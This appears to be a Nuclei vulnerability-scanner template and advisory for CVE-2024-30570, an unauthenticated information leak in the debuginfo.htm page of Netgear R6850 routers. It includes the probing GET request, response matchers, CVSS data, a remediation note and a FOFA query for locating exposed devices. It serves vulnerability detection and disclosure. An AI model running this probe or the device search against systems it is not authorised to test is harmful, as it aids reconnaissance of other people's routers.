Netgear R6850 router firmware version V1.1.0.88 contains an information leakage vulnerability in the debuginfo.htm page. This hidden interface is not protected by authentication, allowing unauthenticated attackers to access sensitive informationsuch as product model name, WAN connection type, and potentially other system details.
PoC代码[已公开]
id: CVE-2024-30570
info:
name: Netgear R6850 - Information Disclosure
author: ritikchaddha
severity: medium
description: |
Netgear R6850 router firmware version V1.1.0.88 contains an information leakage vulnerability in the debuginfo.htm page. This hidden interface is not protected by authentication, allowing unauthenticated attackers to access sensitive informationsuch as product model name, WAN connection type, and potentially other system details.
remediation: |
Restrict access to the debuginfo.htm page by implementing proper authentication. Keep router firmware updated to the latest version once a patch is available.
reference:
- https://github.com/funny-mud-peee/IoT-vuls/blob/main/netgear%20R6850/Info%20Leak%20in%20Netgear-R6850%EF%BC%88debuginfo.htm%EF%BC%89.md
- https://nvd.nist.gov/vuln/detail/CVE-2024-30570
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-30570
cwe-id: CWE-200
epss-score: 0.1579
epss-percentile: 0.94494
metadata:
verified: true
max-request: 1
product: Netgear R6850 Router
vendor: Netgear
version: V1.1.0.88
fofa-query: app="NETGEAR" && "R6850"
tags: cve,cve2024,netgear,router,exposure,unauth
http:
- method: GET
path:
- "{{BaseURL}}/debuginfo.htm"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<br>WAN connection type"
- type: status
status:
- 200
# digest: 4b0a00483046022100d4e461c56e031b71e67b986a354cd49b6fe099d5f7694c48662af167c3bfbd15022100a8788b44561c9a238024f1b370c5473c8ad631f4c65afe176138fe80b6f4b6e5:922c64590222798bb761d5b6d8e72950